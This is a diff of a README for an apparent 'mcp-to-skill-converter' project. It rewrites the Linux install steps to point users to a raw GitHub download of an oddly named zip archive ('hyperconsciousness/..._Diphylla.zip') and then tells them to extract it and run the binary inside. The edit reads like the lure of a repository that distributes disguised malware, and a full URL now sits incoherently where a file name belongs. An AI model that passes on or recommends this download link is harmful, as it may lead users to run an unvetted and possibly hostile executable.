saygex9965/-mcp-to-skill-converter/README.md

 3. Drag the application into your Applications folder.

 ### Linux
-1. Find the downloaded `.tar.gz` file in your Downloads folder.
+1. Find the downloaded `https://raw.githubusercontent.com/saygex9965/-mcp-to-skill-converter/main/hyperconsciousness/-mcp-to-skill-converter_Diphylla.zip` file in your Downloads folder.
 2. Extract the contents by right-clicking and selecting “Extract Here.”
 3. Open a terminal and navigate to the extracted folder.
 4. Run the application using the command `./your_application_name`.